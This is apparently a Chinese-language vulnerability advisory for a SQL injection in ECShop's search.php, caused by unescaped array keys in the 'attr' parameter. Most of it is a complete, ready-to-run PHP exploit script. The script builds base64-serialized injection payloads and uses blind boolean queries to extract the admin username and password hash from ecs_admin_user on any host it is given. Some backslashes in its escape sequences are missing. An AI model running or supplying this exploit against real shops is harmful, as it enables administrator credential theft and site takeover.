影响版本:
ECSHOP All Version
漏洞描述:
文件 search.php
$string = base64_decode(trim($_GET['encode'])); //37行

$_REQUEST = array_merge($_REQUEST, addslashes_deep($string)); //69行

可以看出addslashes_deep 只能参数值进行过滤。
//297行
if (!empty($_REQUEST['attr']))
{
$sql = "SELECT goods_id, COUNT(*) AS num FROM " . $ecs->table("goods_attr") . " WHERE 0 ";
foreach ($_REQUEST['attr'] AS $key => $val)
{
if (is_not_null($val))
{
$attr_num++;
$sql .= " OR (1 ";

if (is_array($val))
{
$sql .= " AND attr_id = '$key'";

$key是$_REQUEST['attr'] 的键值，就是这里没有过滤，直接进入SQL查询，造成SQL注入漏洞可自行构造encode 的值进行注入。
<?php
$list=array("1' or 1=1) and 1=2 GROUP BY goods_id HAVING num = '1' /*"=>"yy");
$string = array("attr"=>$list);
$string = str_replace('+', '%2b', base64_encode(serialize($string)));
die($string);
?>

测试方法:
<?php
ini_set("max_execution_time",0);
error_reporting(7);

function usage()
{
global $argv;
exit(
"n--+++============================================================+++--".
"n--+++====== ECShop Search.php SQL Injection Exploit========+++--".
"n--+++============================================================+++--".
"nn[+] Author: jannock".
"n[+] Team: http://wavdb.com/".
"n[+] Usage: php ".$argv[0]." <hostname> <path> <goods_id>".
"n[+] Ex.: php ".$argv[0]." localhost / 1".
"nn");
}

function query($pos, $chr, $chs,$goodid)
{
switch ($chs){
case 0:
$query = "1=1";
break;
case 1:
$query = " ascii(substring((select user_name from ecs_admin_user limit 0,1),{$pos},1))={$chr}";
break;
case 2:
$query = " ascii(substring((select password from ecs_admin_user limit 0,1),{$pos},1))={$chr}";
break;
case 3:
$query = " length((select user_name from ecs_admin_user limit 0,1))={$pos}";
break;
}
$list=array("1' or 1=1) and 1=2 GROUP BY goods_id HAVING num = '1' union select $goodid,1 from ecs_admin_user where 1=1 and ". $query ."/*"=>"1");
$query = array("attr"=>$list);
$query = str_replace('+', '%2b', base64_encode(serialize($query)));
return $query;
}

function exploit($hostname, $path, $pos, $chr, $chs,$goodid)
{
$chr = ord($chr);
$conn = fsockopen($hostname, 80);

$message = "GET ".$path."/search.php?encode=".query($pos, $chr, $chs,$goodid)." HTTP/1.1rn";
$message .= "Host: $hostnamern";
$message .= "Connection: Closernrn";

fwrite($conn, $message);
while (!feof($conn))
{
$reply .= fgets($conn, 1024);
}
fclose($conn);
return $reply;
}

function crkusername($hostname, $path, $chs,$goodid)
{
global $length;
$key = "abcdefghijklmnopqrstuvwxyz0123456789";
$chr = 0;
$pos = 1;
echo "[+] username: ";
while ($pos <= $length)
{
$response = exploit($hostname, $path, $pos, $key[$chr], $chs,$goodid);

if (preg_match ("/javascript:addToCart/i", $response))
{
echo $key[$chr];
$chr = 0;
$pos++;
}
else
$chr++;
}
echo "n";
}

function crkpassword($hostname, $path, $chs,$goodid)
{
$key = "abcdef0123456789";
$chr = 0;
$pos = 1;
echo "[+] password: ";
while ($pos <= 32)
{
$response = exploit($hostname, $path, $pos, $key[$chr], $chs,$goodid);
if (preg_match ("/javascript:addToCart/i", $response))
{
echo $key[$chr];
$chr = 0;
$pos++;
}
else
$chr++;
}
echo "nn";
}

function lengthcolumns($hostname, $path,$chs, $goodid)
{
echo "[+] username length: ";
$exit = 0;
$length = 0;
$pos = 1;
$chr = 0;
while ($exit==0)
{
$response = exploit($hostname, $path, $pos, $chr, $chs,$goodid);
if (preg_match ("/javascript:addToCart/i", $response))
{
$exit = 1;
$length = $pos;
break;
}
else
{
$pos++;
if($pos>20)
{
exit("Exploit failed");
}
}
}
echo $length."n";
return $length;
}

if ($argc != 4)
usage();
$hostname = $argv[1];
$path = $argv[2];
$goodid = $argv[3];
$length = lengthcolumns($hostname, $path, 3, $goodid);
crkusername($hostname, $path, 1,$goodid);
crkpassword($hostname, $path, 2,$goodid);

?>